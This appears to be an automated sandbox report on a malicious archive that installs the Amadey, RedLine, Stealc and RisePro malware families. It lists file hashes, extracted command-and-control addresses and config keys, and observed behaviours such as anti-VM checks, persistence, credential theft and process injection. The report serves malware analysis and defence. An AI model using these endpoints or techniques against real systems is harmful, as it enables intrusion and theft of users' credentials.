amadey | ad87972f0949b9ce741f1e2d4cf1daa64fc3bf32dc1dbc926c1579138fb0bace

Analysis

max time kernel
298s
max time network
297s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
27-06-2024 07:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

soft version3193.rar
Size

9.7MB
MD5

c9a6e2006c30e6c3b422350939728270
SHA1

0fd821b556c6b1b2a13df50fa05213a638fb136b
SHA256

ad87972f0949b9ce741f1e2d4cf1daa64fc3bf32dc1dbc926c1579138fb0bace
SHA512

ba3f144e6f5ea3202d88004c8bdf2947dcb2b22cdf90ecf27873212957d24c704d737fa1a4e40dc06fa92a900d818ac4e8d137a30cb01c48edd87fc5464f4dd3
SSDEEP

196608:0k6jL1GnCcijPbuirANVkqx03ksn2EgI73pQKBX5Va8I6lBAcRms58:0k6nMfi+N/kqIHUKdRIyrRj58

Score

10^/10

amadey privateloader redline risepro stealc 0e6740 default logsdiller cloud (tg: @logsdillabot)discovery evasion execution infostealer loader persistence spyware stealer themida trojan

Malware Config

Extracted

Family

risepro

191.101.209.39

5.42.66.10

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

5.42.65.92:27953

Extracted

Family

stealc

Botnet

default

http://85.28.47.4

Attributes

url_path
/920475a59bac849d.php

Extracted

Family

amadey

Version

4.21

Botnet

0e6740

http://147.45.47.155

Attributes

install_dir
9217037dc9
install_file
explortu.exe
strings_key
8e894a8a4a3d0da8924003a561cfb244
url_paths
/ku4Nor9/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Modifies firewall policy service 3 TTPs 1 IoCs
evasion

Modify Registry
T1112

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

setup.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" setup.exe
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
RedLine payload 1 IoCs

Processes:

resource yara_rule

behavioral1/memory/3848-383-0x0000000000400000-0x0000000000450000-memory.dmp family_redline
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	setup.exe

resource	yara_rule
behavioral1/memory/3848-383-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

explortu.exeexplortu.exeexplortu.exeLAjLRnhV4UjOx8B3HbyvLFc4.exeBAEBFIIECB.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	LAjLRnhV4UjOx8B3HbyvLFc4.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	BAEBFIIECB.exe

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

220 1416 rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXE

pid process

1768 powershell.exe
3876 powershell.exe
4392 powershell.exe
4792 powershell.exe
180 powershell.exe
1424 powershell.EXE
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource yara_rule

C:\Users\Admin\Documents\SimpleAdobe\mAph8Of7DxihsslLJNYfDDIp.exe net_reactor
behavioral1/memory/1876-476-0x0000000000390000-0x00000000007CC000-memory.dmp net_reactor

flow	pid	process
220	1416	rundll32.exe

pid	process
1768	powershell.exe
3876	powershell.exe
4392	powershell.exe
4792	powershell.exe
180	powershell.exe
1424	powershell.EXE

resource	yara_rule
C:\Users\Admin\Documents\SimpleAdobe\mAph8Of7DxihsslLJNYfDDIp.exe	net_reactor
behavioral1/memory/1876-476-0x0000000000390000-0x00000000007CC000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

BAEBFIIECB.exeexplortu.exeexplortu.exeexplortu.exeLAjLRnhV4UjOx8B3HbyvLFc4.exerundll32.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	BAEBFIIECB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	LAjLRnhV4UjOx8B3HbyvLFc4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	LAjLRnhV4UjOx8B3HbyvLFc4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	BAEBFIIECB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

setup.exeInstall.exeG8FbtlgLE3rUkMPXnsq75quh.execmd.exeBAEBFIIECB.exeexplortu.exekKGgJLM.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	G8FbtlgLE3rUkMPXnsq75quh.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	BAEBFIIECB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	explortu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	kKGgJLM.exe

Drops startup file 1 IoCs

Processes:

LAjLRnhV4UjOx8B3HbyvLFc4.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk LAjLRnhV4UjOx8B3HbyvLFc4.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk	LAjLRnhV4UjOx8B3HbyvLFc4.exe

Executes dropped EXE 24 IoCs

Processes:

setup.exesetup.exeG8FbtlgLE3rUkMPXnsq75quh.exexBXjl0R8rYG45a3wzU77TxNo.exeLAjLRnhV4UjOx8B3HbyvLFc4.exePXLm4NTG4LxHCIQW6UGEFQZ3.exef8rA590jTVvwofQOQzIn6gvr.exeNSBT2UTHbN3rUH67MwoPLEur.exenuFrcSpmylkm5G1HC88Qwegm.exe3IfifMzwN9KSsku1z7iQUZZd.exe3IfifMzwN9KSsku1z7iQUZZd.tmpInstall.exedirectwavmp3splitter.exeInstall.exedirectwavmp3splitter.exemAph8Of7DxihsslLJNYfDDIp.exeBAEBFIIECB.exeexplortu.exe7785ba0063.exeeqtpkqwqodik.exeInstall.exeexplortu.exekKGgJLM.exeexplortu.exe

pid	process
4732	setup.exe
2096	setup.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
4456	xBXjl0R8rYG45a3wzU77TxNo.exe
4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe
5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe
2548	f8rA590jTVvwofQOQzIn6gvr.exe
4724	NSBT2UTHbN3rUH67MwoPLEur.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
3596	3IfifMzwN9KSsku1z7iQUZZd.exe
2616	3IfifMzwN9KSsku1z7iQUZZd.tmp
4020	Install.exe
2404	directwavmp3splitter.exe
1840	Install.exe
1428	directwavmp3splitter.exe
1876	mAph8Of7DxihsslLJNYfDDIp.exe
1700	BAEBFIIECB.exe
3820	explortu.exe
2384	7785ba0063.exe
4088	eqtpkqwqodik.exe
4972	Install.exe
2236	explortu.exe
3720	kKGgJLM.exe
1372	explortu.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

explortu.exeexplortu.exeBAEBFIIECB.exeexplortu.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	BAEBFIIECB.exe
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	explortu.exe

Loads dropped DLL 4 IoCs

Processes:

3IfifMzwN9KSsku1z7iQUZZd.tmpG8FbtlgLE3rUkMPXnsq75quh.exerundll32.exe

pid process

2616 3IfifMzwN9KSsku1z7iQUZZd.tmp
1372 G8FbtlgLE3rUkMPXnsq75quh.exe
1372 G8FbtlgLE3rUkMPXnsq75quh.exe
1416 rundll32.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2616	3IfifMzwN9KSsku1z7iQUZZd.tmp
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
1416	rundll32.exe

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/4428-190-0x0000000000550000-0x000000000110A000-memory.dmp	themida
behavioral1/memory/4428-197-0x0000000000550000-0x000000000110A000-memory.dmp	themida
behavioral1/memory/4428-198-0x0000000000550000-0x000000000110A000-memory.dmp	themida
behavioral1/memory/4428-199-0x0000000000550000-0x000000000110A000-memory.dmp	themida
behavioral1/memory/4428-210-0x0000000000550000-0x000000000110A000-memory.dmp	themida
behavioral1/memory/4428-196-0x0000000000550000-0x000000000110A000-memory.dmp	themida
C:\Users\Admin\Documents\SimpleAdobe\LAjLRnhV4UjOx8B3HbyvLFc4.exe	themida
behavioral1/memory/4428-753-0x0000000000550000-0x000000000110A000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

LAjLRnhV4UjOx8B3HbyvLFc4.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe"	LAjLRnhV4UjOx8B3HbyvLFc4.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

LAjLRnhV4UjOx8B3HbyvLFc4.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LAjLRnhV4UjOx8B3HbyvLFc4.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	LAjLRnhV4UjOx8B3HbyvLFc4.exe

Drops Chrome extension 2 IoCs

Processes:

kKGgJLM.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	kKGgJLM.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	kKGgJLM.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

Install.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

140 iplogger.org
141 iplogger.org
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

69 api.myip.com
70 ipinfo.io
71 ipinfo.io
68 api.myip.com
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

3652 powercfg.exe
4764 powercfg.exe
4480 powercfg.exe
448 powercfg.exe
344 powercfg.exe
2136 powercfg.exe
876 powercfg.exe
4812 powercfg.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

flow	ioc
140	iplogger.org
141	iplogger.org

flow	ioc
69	api.myip.com
70	ipinfo.io
71	ipinfo.io
68	api.myip.com

pid	process
3652	powercfg.exe
4764	powercfg.exe
4480	powercfg.exe
448	powercfg.exe
344	powercfg.exe
2136	powercfg.exe
876	powercfg.exe
4812	powercfg.exe

Drops file in System32 directory 35 IoCs

Processes:

Install.exekKGgJLM.exesetup.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	kKGgJLM.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	kKGgJLM.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_377D07FDFD79CC3A0CC83B675B685EDC	kKGgJLM.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_11C7636B4ED451F6A0167B1B5EB1E2C1	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_74182CF0A4AE5ED3D7F44586422BCB36	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_74182CF0A4AE5ED3D7F44586422BCB36	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_11C7636B4ED451F6A0167B1B5EB1E2C1	kKGgJLM.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	kKGgJLM.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	kKGgJLM.exe
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	kKGgJLM.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_377D07FDFD79CC3A0CC83B675B685EDC	kKGgJLM.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

Processes:

LAjLRnhV4UjOx8B3HbyvLFc4.exeG8FbtlgLE3rUkMPXnsq75quh.exeBAEBFIIECB.exeexplortu.exe7785ba0063.exeexplortu.exeexplortu.exe

pid	process
4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
1700	BAEBFIIECB.exe
3820	explortu.exe
2384	7785ba0063.exe
2236	explortu.exe
1372	explortu.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

PXLm4NTG4LxHCIQW6UGEFQZ3.exexBXjl0R8rYG45a3wzU77TxNo.exemAph8Of7DxihsslLJNYfDDIp.exef8rA590jTVvwofQOQzIn6gvr.exeeqtpkqwqodik.exe

description	pid	process	target process
PID 5092 set thread context of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	MSBuild.exe
PID 4456 set thread context of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	MSBuild.exe
PID 1876 set thread context of 2356	1876	mAph8Of7DxihsslLJNYfDDIp.exe	MSBuild.exe
PID 2548 set thread context of 3580	2548	f8rA590jTVvwofQOQzIn6gvr.exe	BitLockerToGo.exe
PID 4088 set thread context of 3944	4088	eqtpkqwqodik.exe	conhost.exe
PID 4088 set thread context of 2752	4088	eqtpkqwqodik.exe	svchost.exe

Drops file in Program Files directory 14 IoCs

Processes:

kKGgJLM.exe

description	ioc	process
File created	C:\Program Files (x86)\dLLzADClkagU2\EhbGVIS.xml	kKGgJLM.exe
File created	C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\ErwKKvV.xml	kKGgJLM.exe
File created	C:\Program Files (x86)\RgdiTWAdU\ibnZZl.dll	kKGgJLM.exe
File created	C:\Program Files (x86)\dLLzADClkagU2\ViRbBneZkZMll.dll	kKGgJLM.exe
File created	C:\Program Files (x86)\RgdiTWAdU\rbamWFx.xml	kKGgJLM.exe
File created	C:\Program Files (x86)\wGxkUGMqSkfBC\tpuapcA.xml	kKGgJLM.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	kKGgJLM.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	kKGgJLM.exe
File created	C:\Program Files (x86)\wGxkUGMqSkfBC\omgwHNg.dll	kKGgJLM.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	kKGgJLM.exe
File created	C:\Program Files (x86)\qMYsQGpJtRFFYsdYXYR\EcbylAk.dll	kKGgJLM.exe
File created	C:\Program Files (x86)\LUWSYkNLogUn\MmbYzAa.dll	kKGgJLM.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	kKGgJLM.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	kKGgJLM.exe

Drops file in Windows directory 5 IoCs

Processes:

schtasks.exeBAEBFIIECB.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bjeWJKrHnPpdAGCduF.job	schtasks.exe
File created	C:\Windows\Tasks\explortu.job	BAEBFIIECB.exe
File created	C:\Windows\Tasks\zjtCPqTOixnxYITTP.job	schtasks.exe
File created	C:\Windows\Tasks\gwLAkOfFqvEnRPY.job	schtasks.exe
File created	C:\Windows\Tasks\mFeioppqsVnzBGRpZ.job	schtasks.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

2392 sc.exe
388 sc.exe
2544 sc.exe
4696 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

1016 4972 WerFault.exe Install.exe
1896 1840 WerFault.exe Install.exe
4380 3720 WerFault.exe kKGgJLM.exe

pid	process
2392	sc.exe
388	sc.exe
2544	sc.exe
4696	sc.exe

pid	pid_target	process	target process
1016	4972	WerFault.exe	Install.exe
1896	1840	WerFault.exe	Install.exe
4380	3720	WerFault.exe	kKGgJLM.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

G8FbtlgLE3rUkMPXnsq75quh.exeMSBuild.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	G8FbtlgLE3rUkMPXnsq75quh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	G8FbtlgLE3rUkMPXnsq75quh.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Install.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exekKGgJLM.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{25d8ed48-0000-0000-0000-d01200000000}\NukeOnDelete = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{25d8ed48-0000-0000-0000-d01200000000}\MaxCapacity = "14116"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{25d8ed48-0000-0000-0000-d01200000000}	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
